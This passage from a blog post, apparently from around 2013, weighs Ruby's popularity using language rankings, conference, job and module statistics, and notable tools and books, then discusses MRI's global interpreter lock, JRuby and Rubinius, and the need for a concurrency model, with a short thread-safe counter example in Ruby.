&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.reddit.com&#x2F;comments&#x2F;1oi8wd&quot;&gt;Discussion on Reddit about the Hacker News discussion&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;quantitative-analysis&quot;&gt;&lt;strong&gt;Quantitative analysis&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s start with some graphs. Everybody loves graphs!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-QCE2zU-R9MKX6Sqj5lZNyQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Programming language popularity indexes&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;adambard.com&#x2F;blog&#x2F;top-github-languages-for-2013-so-far&#x2F;&quot;&gt;Ruby seems to be the language with the second most repositories&lt;&#x2F;a&gt; created on GitHub (218,812, not counting forks) between January 1st and August 30th, 2013. JavaScript is first, with 264,131 repositories created.&lt;&#x2F;p&gt;
&lt;p&gt;As reported by the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;TIOBE_index&quot;&gt;TIOBE Index&lt;&#x2F;a&gt;, Ruby has dropped one position in the ranking this year. In January 2013 Ruby was the eleventh most used language; it is now the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.tiobe.com&#x2F;index.php&#x2F;content&#x2F;paperinfo&#x2F;tpci&#x2F;index.html&quot;&gt;twelfth&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.tiobe.com&#x2F;index.php&#x2F;content&#x2F;paperinfo&#x2F;tpci&#x2F;Ruby.html&quot;&gt;TIOBE ratings for Ruby&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-gt6Mt5Fq20JpvL3DNwYBNA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;According to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;sites.google.com&#x2F;site&#x2F;pydatalog&#x2F;pypl&#x2F;PyPL-PopularitY-of-Programming-Language&quot;&gt;Popularity of Programming Language index&lt;&#x2F;a&gt; (PYPL), Ruby is the ninth most popular programming language. PYPL is created by analyzing how often language tutorials are searched on Google.&lt;&#x2F;p&gt;
&lt;p&gt;According to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;redmonk.com&#x2F;sogrady&#x2F;2014&#x2F;01&#x2F;22&#x2F;language-rankings-1-14&#x2F;&quot;&gt;RedMonk Programming Language Rankings&lt;&#x2F;a&gt;, at this moment, Ruby is the seventh most popular language based on correlations between GitHub’s and Stack Overflow’s rankings.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Other popularity indicators&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Let’s move onto other indicators.&lt;&#x2F;p&gt;
&lt;p&gt;Ruby conferences registered by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lanyrd.com&#x2F;&quot;&gt;lanyrd&lt;&#x2F;a&gt; per year:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;2009: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lanyrd.com&#x2F;topics&#x2F;ruby&#x2F;2009&#x2F;&quot;&gt;16&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;2010: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lanyrd.com&#x2F;topics&#x2F;ruby&#x2F;2010&#x2F;&quot;&gt;50&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;2011: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lanyrd.com&#x2F;topics&#x2F;ruby&#x2F;2011&#x2F;&quot;&gt;139&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;2012: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lanyrd.com&#x2F;topics&#x2F;ruby&#x2F;2012&#x2F;&quot;&gt;188&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;2013: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lanyrd.com&#x2F;topics&#x2F;ruby&#x2F;2013&#x2F;&quot;&gt;207&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The absolute number of conferences kept growing, but the growth rate slowed.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;modulecounts.com&#x2F;&quot;&gt;Module counts&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-syyHrXaZtCo9O1V6iTtTEQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The number of modules seems to have kept growing at about the same rate over the last few years.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.ohloh.net&#x2F;p&#x2F;ruby&quot;&gt;Ruby’s lines of code&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-Dibiyr75hsGDLCatZTiRxQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Ohloh reports that the number of lines of code in the Ruby language has grown at a steady pace.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.google.com&#x2F;trends&#x2F;explore#cat=0-5&amp;amp;q=%2Fm%2F06ff5&amp;amp;cmpt=q&quot;&gt;Interest over time reported by Google Trends&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-bHHmLXNdXqaT9IbDoEcfpg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;However, the interest over time registered by Google seems to have plummeted.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.indeed.com&#x2F;jobtrends?q=ruby&quot;&gt;Ruby and JavaScript Indeed job trends (absolute)&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-kFX3kYHAfcR7_NuXO0PtbA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.indeed.com&#x2F;jobtrends?q=ruby%2C+javascript&amp;amp;l=&amp;amp;relative=1&quot;&gt;Ruby and JavaScript Indeed job trends (relative)&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-IwJKDz6AwEQxl93gKlvM7g.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Nevertheless, even if Ruby job postings are way down compared to JavaScript, they are still on the rise and their percentage growth continues to be quite significant. In the startup world, there are at least &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;angel.co&#x2F;javascript&#x2F;jobs&quot;&gt;five startups&lt;&#x2F;a&gt; registered on AngelList that need a JavaScript developer for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;angel.co&#x2F;ruby&#x2F;jobs&quot;&gt;each startup&lt;&#x2F;a&gt; that needs at least someone with Ruby knowledge.&lt;&#x2F;p&gt;
&lt;p&gt;These statistics show that even though Ruby is not as popular as it was a few years ago, it’s still a big player.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;qualitative-data&quot;&gt;&lt;strong&gt;Qualitative data&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;So far we have seen some numbers. Now it’s a good time to check other indicators that account for the liveliness of Ruby.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-P_BdP89ac9dcWAMDTBoaPw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Let me mention a few interesting tools created in Ruby, apart from Rails and other web frameworks such as Sinatra or Padrino. I think this might give an idea of Ruby’s usage. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;brew.sh&#x2F;&quot;&gt;Homebrew&lt;&#x2F;a&gt;, coded in Ruby, is the simplest and most useful package manager for Mac OS X. Even if I prefer alternatives written in Node.js, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bevry&#x2F;docpad&quot;&gt;Docpad&lt;&#x2F;a&gt;, Jekyll, which is coded in Ruby, was one of the main reasons for the popularity of static site generators. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.discourse.org&#x2F;&quot;&gt;Discourse&lt;&#x2F;a&gt; is the best discussion platform. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;artoo.io&#x2F;&quot;&gt;Artoo&lt;&#x2F;a&gt; is a micro-framework for robotics; I don’t know much about it. Ruby also has the two most used IT automation tools in existence: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.getchef.com&#x2F;chef&#x2F;&quot;&gt;Chef&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;puppetlabs.com&#x2F;&quot;&gt;Puppet&lt;&#x2F;a&gt;. These are two really big players that won’t disappear anytime soon, and it doesn’t look as though they want to move away from Ruby.&lt;&#x2F;p&gt;
&lt;p&gt;Regarding books, Ruby has always had great and fascinating books such as:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;mislav.uniqpath.com&#x2F;poignant-guide&#x2F;&quot;&gt;Why’s (Poignant) Guide to Ruby&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.confidentruby.com&#x2F;&quot;&gt;Confident Ruby&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.poodr.com&#x2F;&quot;&gt;Practical Object-Oriented Design in Ruby (POODR)&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;eloquentruby.com&#x2F;&quot;&gt;Eloquent Ruby&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;pragprog.com&#x2F;book&#x2F;ager&#x2F;exceptional-ruby&quot;&gt;Exceptional Ruby: Master the Art of Handling Failure in Ruby&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.manning.com&#x2F;black2&#x2F;&quot;&gt;The Well-Grounded Rubyist&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;And now we have &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;patshaughnessy.net&#x2F;ruby-under-a-microscope&quot;&gt;Ruby Under a Microscope&lt;&#x2F;a&gt;, one of the latest and greatest books about Ruby, keeping up with this tradition of precious books.&lt;&#x2F;p&gt;
&lt;p&gt;Last but not least, let’s see some Ruby talks:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=fyq8Z6E5E14&quot;&gt;Ruby-Core dilemmas by Marc-André Lafortune&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=wPu2kVI09Yc&quot;&gt;Towards Tooling; A Look at What is Missing From our Toolbox&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=mhXyNGX38mw&quot;&gt;Ruby On Robots Using Artoo by Ron Evans&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=cxqjgq4VhgY&quot;&gt;Thinking about Machine Learning with Ruby by Bryan Liles&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;youtu.be&#x2F;cO26TjhQWvA&quot;&gt;Machine Learning with Ruby&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;michaelrbernste.in&#x2F;2013&#x2F;06&#x2F;10&#x2F;to-know-a-garbage-collector-goruco-2013.html&quot;&gt;To Know A Garbage Collector&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;As we can see, very different pieces of software are crafted with Ruby, and Ruby developers seem to be attracted to very different things. From my point of view, these are only examples that show how much life there is in the Ruby world. In my humble opinion, Ruby is not going to die anytime soon. I think that, while Ruby’s hype is dead, the language and its great community have a great future.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;ruby-s-hardest-problem&quot;&gt;&lt;strong&gt;Ruby’s hardest problem&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;This doesn’t mean there are no problems with Ruby. Ruby seems to be in the same order of magnitude in terms of speed as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.unlimitednovelty.com&#x2F;2012&#x2F;06&#x2F;ruby-is-faster-than-python-php-and-perl.html&quot;&gt;Python, PHP, and Perl&lt;&#x2F;a&gt;, but in general it is not the fastest kid on the block. Even Matsumoto, its creator, admits it!&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.infoworld.com&#x2F;d&#x2F;application-development&#x2F;infoworld-interview-ruby-creator-sets-sights-mobile-171503?page=0,1&quot;&gt;Yukihiro Matsumoto details the past, present, and future of the popular programming language, calling mobile ‘the way to go’&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;InfoWorld:&lt;&#x2F;strong&gt; Are there any limitations with developing Ruby applications?&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Matsumoto:&lt;&#x2F;strong&gt; Well, in some cases, performance could be the limitation. For example, Twitter was originally written in Ruby, but it now has billions of users, so it’s larger; its core [is now] on top of the JVM. It was originally running on C Ruby, my Ruby. [With Twitter’s JVM-based program], the program is written in Scala and Clojure.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I think Matsumoto represents very well the self-critical spirit of the Ruby community. But it would be great if we could sidestep the performance problem. One way to do it is with concurrency and parallelism.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Ruby implementations&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Some say that:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Both Python and Ruby have full support for multi-threading. There are some implementations (e.g. CPython, MRI, YARV) which cannot actually run threads in parallel, but that’s a limitation of those specific implementations, not the language. This is similar to Java, where there are also some implementations which cannot run threads in parallel, but that doesn’t mean that Java is single-threaded. Note that in both cases there are lots of implementations which can run threads in parallel: PyPy, IronPython, Jython, IronRuby and JRuby are only few of the examples. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stackoverflow.com&#x2F;questions&#x2F;3086467&#x2F;confused-are-languages-like-python-ruby-single-threaded-unlike-say-java-for&quot;&gt;Are languages like python and ruby single threaded unlike say java?&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;But come on, that’s pure theory. Almost everybody uses MRI, the main Ruby implementation. I think the main reason is that it’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;andrewjgrimm.wordpress.com&#x2F;2013&#x2F;07&#x2F;08&#x2F;mri-boring-but-reliable&#x2F;&quot;&gt;reliable&lt;&#x2F;a&gt;. However, the issue with MRI is that it:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;has something called a global interpreter lock (GIL). It’s a lock around the execution of Ruby code. This means that in a multi-threaded context, only one thread can execute Ruby code at any one time. So if you have 8 threads busily working on a 8-core machine, only one thread and one core will be busy at any given time. The GIL exists to protect Ruby internals from race conditions that could corrupt data. There are caveats and optimizations, but this is the gist. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.jstorimer.com&#x2F;blogs&#x2F;workingwithcode&#x2F;8085491-nobody-understands-the-gil&quot;&gt;Nobody understands the GIL:&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
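&lt;p&gt;A minimal sketch of what this means in practice: even though the GIL serializes the execution of Ruby code on MRI, compound operations like incrementing a shared counter are not atomic, so application code still needs its own synchronization:&lt;&#x2F;p&gt;

```ruby
# Sketch: on MRI the GIL serializes Ruby bytecode execution, but it does not
# make compound operations such as "count += 1" atomic, so threads still need
# an explicit Mutex to avoid corrupting shared data. Meanwhile, these eight
# threads never run Ruby code on two cores at once.
count = 0
mutex = Mutex.new

threads = 8.times.map do
  Thread.new do
    10_000.times { mutex.synchronize { count += 1 } }
  end
end
threads.each { |t| t.join }

puts count # prints 80000
```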
&lt;p&gt;With GIL or without it (read &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;tonyarcieri.com&#x2F;2012-the-year-rubyists-learned-to-stop-worrying-and-love-the-threads&quot;&gt;2012: The Year Rubyists Learned to Stop Worrying and Love Threads&lt;&#x2F;a&gt;) it’s pretty clear that:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;the single-core nature of the canonical Ruby interpreter, MRI (the “Matz Ruby Interpreter”), is limiting Ruby’s potential applications.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.igvita.com&#x2F;2008&#x2F;11&#x2F;13&#x2F;concurrency-is-a-myth-in-ruby&#x2F;&quot;&gt;Concurrency is a Myth in Ruby&lt;&#x2F;a&gt;. While we wait for this to get solved in MRI we can check out &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.unlimitednovelty.com&#x2F;2012&#x2F;03&#x2F;why-critics-of-rails-have-it-all-wrong.html&quot;&gt;why critics of Rails have it all wrong (and Ruby’s bright multicore future)&lt;&#x2F;a&gt; and learn how to overcome this problem:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Rubinius is an implementation of Ruby designed for concurrency, using native threads to run Ruby code on all the CPU cores. It also has a low-pause generational garbage collector and an LLVM-based just-in-time (JIT) native machine code compiler. A pretty badass piece of technology, mainly implemented in Ruby itself. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Chicken_or_the_egg&quot;&gt;Chicken or the egg?&lt;&#x2F;a&gt; But it has a big downside: Rubinius currently implements MRI Ruby version 1.8.7, which was released in April 2008, more than five years ago. From what I have read, Rubinius is working on implementing the upcoming MRI 2.1 release.&lt;&#x2F;li&gt;
&lt;li&gt;JRuby runs your Ruby code on the JVM, and that’s why we get real threading. The latest version of JRuby is compatible with MRI Ruby 1.8.7 and 1.9.3. If you haven’t got enough links yet, start reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.engineyard.com&#x2F;2011&#x2F;concurrency-in-jruby&quot;&gt;Concurrency in JRuby&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;youtu.be&#x2F;t_JJD-AEtNM&quot;&gt;JRuby: Insights from Six Years in Production&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;youtu.be&#x2F;4TAwkq0aQdE&quot;&gt;The Future of JRuby by Charles Nutter and Thomas Enebo&lt;&#x2F;a&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;There is also &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;youtu.be&#x2F;yl_zYzPiDto&quot;&gt;Visualizing Garbage Collection in Rubinius, JRuby and Ruby 2.0&lt;&#x2F;a&gt;, which will be useful for any of the three implementations we mentioned.&lt;&#x2F;p&gt;
&lt;p&gt;Even if it’s a synthetic benchmark, this comparison between &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;miguelcamba.com&#x2F;blog&#x2F;2013&#x2F;10&#x2F;05&#x2F;benchmarking-the-ruby-2-dot-1-and-rubinius-2-dot-0&#x2F;&quot;&gt;MRI 1.9.3, MRI 2.0.0, MRI 2.1.0dev, JRuby 1.7.4 and Rubinius 2.0.0&lt;&#x2F;a&gt; has some interesting information.&lt;&#x2F;p&gt;
&lt;p&gt;Again I think it’s a good idea to hear what Matsumoto thinks:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;InfoWorld:&lt;&#x2F;strong&gt; What’s your perspective on alternative Ruby implementations just as JRuby and Rubinius?&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Matsumoto:&lt;&#x2F;strong&gt; I don’t see any problem about other implementations just because the diversity is very sound, the healthy things they have. And actually Ruby, the language, is very good for productivity but the programming environment differs from application to application. For example, some clients require very stable and multicore applications on top of the JVM. In that kind of field, JRuby works better than my Ruby, actually, which is called C Ruby. For most of the cases, C Ruby is good for Web applications. But in certain situations, JRuby and maybe Rubinius are a better fit for a particular requirement.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;we-need-a-concurrency-model&quot;&gt;&lt;strong&gt;We need a concurrency model!&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Having real concurrency, or being able to run code on many cores, doesn’t mean it’s easy to do so:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.smartbear.com&#x2F;programming&#x2F;why-johnny-cant-write-multithreaded-programs&#x2F;&quot;&gt;Why Johnny Can’t Write Multithreaded Programs&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Introductory multithreading materials explain what threads are. Then they launch into discussions of how to make those threads work together in various ways, such as controlling access to shared data with locks and semaphores, and perhaps controlling when things happen with events. There’s detailed discussion of condition variables, memory barriers, critical sections, mutexes, volatile fields, and atomic operations. You’re given examples of how to use those low level constructs to do all manner of systems level things. By the time a programmer is halfway through that material, she thinks she knows how to use those primitives in her applications. After all, if you understand how to use something at the systems level, using it at the application level should be trivial, right?&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;This is like teaching a teenager how to build an internal combustion engine from discrete parts and then, without the benefit of any driving instruction, setting him behind the wheel of a car and turning him loose on the roads. The teenager understands how the car works internally, but he has no idea how to drive it from point A to point B.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Knowing how threads work at the systems level is mostly irrelevant to understanding how to use them in an application program. I’m not saying that programmers shouldn’t know how things work under the hood, just that they shouldn’t expect that knowledge to be directly applicable to the design or implementation of a business application. After all, knowing the details of the intake, compression, combustion, and exhaust cycle doesn’t help you in getting from home to the grocery store and back.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Introductory multithreading textbooks (and computer science courses) shouldn’t be teaching those low level constructs. Rather, they should concentrate on common classes of problems and show developers how to use higher level constructs to solve those problems. For example, a large number of business applications are in concept extremely simple programs: They read data from one or more input devices, apply some arbitrarily complex processing to that data (perhaps querying some other stored data in the process), and then output the results.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;You need a concurrency model or you will keep recreating one on each project. In my humble opinion, these words about Javascript written by Joe Armstrong, creator of Erlang, apply almost perfectly to Ruby too, even though it has &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;merbist.com&#x2F;2011&#x2F;02&#x2F;22&#x2F;concurrency-in-ruby-explained&#x2F;&quot;&gt;threads, processes and fibers&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;joearms.github.io&#x2F;2013&#x2F;04&#x2F;02&#x2F;Red-and-Green-Callbacks.html&quot;&gt;Red and Green Callbacks&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;It’s actually worse, every Javascript programmer who has a concurrent problem to solve must invent their own concurrency model. The problem is that they don’t know that this is what they are doing. Every time a Javascript programmer writes a line of code that says “on this do that” they are actually inventing a new concurrency model, and they haven’t a clue how the code will interleave when it executes.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;(I actually have a love-hate relationship with Javascript, most parts I love but I hate the concurrency model- that might sound funny since Javascript has no concurrency model — so there’s nothing to hate :-)&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;What’s even more difficult to understand is errors. Errors in multi-threaded callback code with shared memory is something that would give me an extremely large headache.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
